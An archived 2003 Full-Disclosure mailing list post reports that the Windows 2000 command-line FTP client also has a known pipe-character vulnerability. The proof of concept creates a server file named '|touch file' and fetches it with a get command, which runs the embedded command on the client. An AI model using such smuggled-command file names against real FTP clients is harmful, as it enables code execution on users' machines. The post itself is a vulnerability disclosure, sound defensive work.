Securityfocus has a post on its website regarding this vulnerability in many ftp clients. I've tested and subsequently validated this issue on many of the platforms mentioned in their advisory. They mention that the Netscape client on Windows 2000 Professional, but fails to mention that the commandline ftp client included with win2k (server and pro) are also vulnerable. <-----------------------snip-----------------------> # Create file on ftp server for download by client. schoe@ftp:/home/ftp$ touch \|touch\ file # Start commandline ftp client on win2k. Microsoft Windows 2000 [Version 5.00.2195] <C> Copyright 1985-2000 Microsoft Corp. C:\ ftp ftp.xxxx.com .... ftp> get "|touch file.txt" ... ftp> quit 221 Goodbye. # "C:\file.txt" should now exist. <-----------------------snap-----------------------> Multiple Vendor VTP pipe Vulnerability ====================================== www.securityfocus.com/bid/396/info .-------------------------------------------. | Sung J. Choe <schoe[at]oicinc.com>, TICSA | | Systems Admin, Facility Security Officer | .-------------------------------------------.---. | Oceanic Imaging Consultants, Inc. | | Phone #: (808) 539.3634 | .-----------------------------------. _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
This archive was generated by hypermail 2b30 : Tue Feb 25 2003 - 14:37:41 PST